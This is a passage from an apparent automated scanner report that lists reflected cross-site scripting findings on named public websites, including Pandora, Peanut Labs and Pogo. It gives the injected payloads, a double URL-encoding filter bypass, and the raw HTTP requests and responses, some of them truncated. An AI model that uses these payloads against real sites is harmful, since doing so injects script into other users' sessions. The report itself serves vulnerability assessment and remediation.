GET /blog/30833"><script>alert(1)< Host: www.outofhanwell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 05:23:22 GMT Server: Apache Content-Length: 2335 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR <html> <head> <title>Error 404 - Not found</title> </head> <frameset rows="100%" framebo ...[SNIP]... <frame src="http://www ...[SNIP]... |
3.592. http://www.pandora.com/people/ [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.pandora.com |
Path: | /people/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf8db"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /people/?cf8db"><script>alert(1)< Host: www.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:20:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 13162 <html> <head> <title>Pandora Radio - Listen to Free Internet Radio, Find New Music</title> <link rel="stylesheet" type="text/css" href="/styles/pandora <link rel="alter ...[SNIP]... <input type="hidden" name="target" value="/people/?webname=&cf8db"><script>alert(1)< ...[SNIP]... |
3.593. http://www.peanutlabs.com/core.php [coreClass parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.peanutlabs.com |
Path: | /core.php |
Issue detail
The value of the coreClass request parameter is copied into the XML document as plain text between tags. The payload 21731<a%20xmlns%3aa%3dThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /core.php?sk=d12cec1 Host: www.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=3jamnj3v5l |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:33:29 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Content-Type: text/xml Content-Length: 229 <?xml version="1.0"?><errorInfo ...[SNIP]... |
3.594. http://www.peanutlabs.com/core.php [coreClass parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.peanutlabs.com |
Path: | /core.php |
Issue detail
The value of the coreClass request parameter is copied into the HTML document as plain text between tags. The payload c0786<img%20src%3daThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /core.php?coreClass=IdCmdc0786<img%20src%3da Host: www.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com X-Requested-With: XMLHttpRequest Accept: application/json, text/javascript, */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=3jamnj3v5l |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:34:08 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Content-Type: text/javascript Content-Length: 106 {"errorInfo":{"error": |
3.595. http://www.peanutlabs.com/core.php [iframe_tag parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.peanutlabs.com |
Path: | /core.php |
Issue detail
The value of the iframe_tag request parameter is copied into the HTML document as plain text between tags. The payload 6d2fe<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /core.php?coreClass=IdCmd Host: www.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com X-Requested-With: XMLHttpRequest Accept: application/json, text/javascript, */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=3jamnj3v5l |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:35:42 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: pl_email=test4%40fastdial Vary: Accept-Encoding,User Content-Type: text/javascript Content-Length: 27869 {"uid":"12633542","user ...[SNIP]... rs old","target":"complete", ...[SNIP]... |
3.596. http://www.peanutlabs.com/core.php [rewardAvailable parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.peanutlabs.com |
Path: | /core.php |
Issue detail
The value of the rewardAvailable request parameter is copied into the HTML document as plain text between tags. The payload c00a4<img%20src%3daThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /core.php?coreClass=IdCmd Host: www.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com X-Requested-With: XMLHttpRequest Accept: application/json, text/javascript, */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=3jamnj3v5l |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:36:07 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: pl_email=test4%40fastdial Vary: Accept-Encoding,User Content-Type: text/javascript Content-Length: 25211 {"uid":"12633542","user ...[SNIP]... |
3.597. http://www.peanutlabs.com/js/iFrame/sc.php [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.peanutlabs.com |
Path: | /js/iFrame/sc.php |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97586'%3balert(1)/This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /js/iFrame/sc.php?userId Host: www.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=3jamnj3v5l |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:33:30 GMT Server: Apache Vary: Accept-Encoding,User Content-Type: text/html Content-Length: 571 <html> <head> <script type="text/javascript" src="http://static <script type="text/javascript" src="http://static ...[SNIP]... <script type="text/javascript"> userId = '998826224-3432-8939b9/97586';alert(1)/ </script> ...[SNIP]... |
3.598. http://www.peanutlabs.com/js/iFrame/sc.php [userId parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.peanutlabs.com |
Path: | /js/iFrame/sc.php |
Issue detail
The value of the userId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff40d'%3balert(1)/This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /js/iFrame/sc.php?userId Host: www.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=3jamnj3v5l |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:32:51 GMT Server: Apache Vary: Accept-Encoding,User Content-Type: text/html Content-Length: 570 <html> <head> <script type="text/javascript" src="http://static <script type="text/javascript" src="http://static ...[SNIP]... <script type="text/javascript"> userId = '998826224-3432 </script> ...[SNIP]... |
3.599. http://www.peanutlabs.com/sampleIframe.php [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.peanutlabs.com |
Path: | /sampleIframe.php |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5765"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sampleIframe.php?userId Host: www.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sex=deleted; pl_email=test4%40fastdial |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:08:23 GMT Server: Apache Vary: Accept-Encoding,User Content-Length: 568 Connection: close Content-Type: text/html <head><title>Sample iFrame</title></head> <body bgcolor="#e7e7e7"> <div align="center"> <iframe align="middle" frameborder=0 scrolling="no" style="width:653px; height:1230px;" src="/pl/userGreeting.php ...[SNIP]... |
3.600. http://www.peanutlabs.com/sampleIframe.php [userId parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.peanutlabs.com |
Path: | /sampleIframe.php |
Issue detail
The value of the userId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f75d4"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sampleIframe.php?userId=f75d4"><script>alert(1)< Host: www.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sex=deleted; pl_email=test4%40fastdial |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:08:18 GMT Server: Apache Vary: Accept-Encoding,User Content-Length: 523 Connection: close Content-Type: text/html <head><title>Sample iFrame</title></head> <body bgcolor="#e7e7e7"> <div align="center"> <iframe align="middle" frameborder=0 scrolling="no" style="width:653px; height:1230px;" src="/pl/userGreeting.php ...[SNIP]... |
3.601. http://www.pogo.com/ [f9258%22%3E%3Cscript%3Ealert(document.cookie parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | / |
Issue detail
The value of the f9258%22%3E%3CscriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?sl=2&f9258%22%3E Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.supressGiftLayer Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:57:31 GMT Server: Apache-Coyote/1.1 Content-Length: 429869 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www.pogo.com ...[SNIP]... |
3.602. http://www.pogo.com/ [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | / |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 575b9"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?sl=2&f9258%22%3E Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.supressGiftLayer Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:11:09 GMT Server: Apache-Coyote/1.1 Content-Length: 429922 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www.pogo.com ...[SNIP]... |
3.603. http://www.pogo.com/account/my-account/recover.do [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://www.pogo.com |
Path: | /account/my-account |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fcb5"><a>43948eebdae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /account/my-account Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 01:59:48 GMT Server: Apache-Coyote/1.1 Content-Length: 22804 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www.pogo.com ...[SNIP]... |
3.604. http://www.pogo.com/action/pogo/createAccount.do [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /action/pogo/createA |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 152d8</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /action/pogo/createA Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 03:01:19 GMT Server: Apache-Coyote/1.1 Content-Length: 43927 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Create Account Page"; s.prop2="pogo"; s.channel="registration"; s.eVar18="un_header_reg"; s.prop7="POGO:regist ...[SNIP]... |
3.605. http://www.pogo.com/action/pogo/createAccount.do [pageSection parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /action/pogo/createA |
Issue detail
The value of the pageSection request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c15b</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /action/pogo/createA Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 03:00:48 GMT Server: Apache-Coyote/1.1 Content-Length: 44067 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Create Account Page"; s.prop2="pogo"; s.channel="registration"; s.eVar18="un_header s.pro ...[SNIP]... |
3.606. http://www.pogo.com/card-games [pageSection parameter] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://www.pogo.com |
Path: | /card-games |
Issue detail
The value of the pageSection request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2874%253c%252fscriptThis behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the pageSection request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.Request
GET /card-games?pageSection Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:59:58 GMT Server: Apache-Coyote/1.1 Content-Length: 105744 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... op6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Unauth Category Page filter - card"; s.prop2="pogo"; s.channel="games"; s.eVar18="un_categorybar s.prop7="POGO:games ...[SNIP]... |
3.607. http://www.pogo.com/home/home.jsp [f9258%22%3E%3Cscript%3Ealert(1 parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /home/home.jsp |
Issue detail
The value of the f9258%22%3E%3CscriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /home/home.jsp?f9258%22 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.supressGiftLayer Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:58:54 GMT Server: Apache-Coyote/1.1 Content-Length: 429600 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www.pogo.com ...[SNIP]... |
3.608. http://www.pogo.com/home/home.jsp [f9258%22%3E%3Cscript%3Ealert(1 parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /home/home.jsp |
Issue detail
The value of the f9258%22%3E%3CscriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /home/home.jsp?f9258%22 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.supressGiftLayer Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:58:56 GMT Server: Apache-Coyote/1.1 Content-Length: 429609 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Unauth Free Pogo Home Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:: s.prop8="Non Authenticated"; if (typeof ...[SNIP]... |
3.609. http://www.pogo.com/home/home.jsp [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /home/home.jsp |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9258"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /home/home.jsp?f9258"><script>alert(1)< Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=DBFBE7E5DB2 Content-Language: en-US Set-Cookie: com.pogo.unid=660657 Set-Cookie: com.pogo.supressGiftLayer Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:20:36 GMT Server: Apache-Coyote/1.1 Content-Length: 429448 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www.pogo.com ...[SNIP]... |
3.610. http://www.pogo.com/hotdeploy/us/homepage/clubpogo-info.jsp [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /hotdeploy/us/homepage |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a423</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /hotdeploy/us/homepage Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 03:00:41 GMT Server: Apache-Coyote/1.1 Content-Length: 26833 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-e ...[SNIP]... p6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="ClubPogo.com 5by5 0708 US page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo s.prop8="Non Authent ...[SNIP]... |
3.611. http://www.pogo.com/hotdeploy/us/homepage/clubpogo-info.jsp [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /hotdeploy/us/homepage |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eadd"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /hotdeploy/us/homepage Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 03:00:40 GMT Server: Apache-Coyote/1.1 Content-Length: 26822 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-e ...[SNIP]... <link rel="canonical" href="http://www.pogo.com ...[SNIP]... |
3.612. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp [&intcmp parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /hotdeploy/us/promotions |
Issue detail
The value of the &intcmp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70262%253c%252fscriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the &intcmp request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.Request
GET /hotdeploy/us/promotions Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:59:52 GMT Server: Apache-Coyote/1.1 Content-Length: 20636 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... %253c%252fscript%253e s.referrer="http://www s.eVar2="pogo"; s.pageName="Boys & Girls Clubs of America"; s.prop2="pogo"; s.channel="pogo"; s.eVar18="un_free_home s.prop7="POGO:pogo ...[SNIP]... |
3.613. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp [intcmp parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /hotdeploy/us/promotions |
Issue detail
The value of the intcmp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75c88%253c%252fscriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
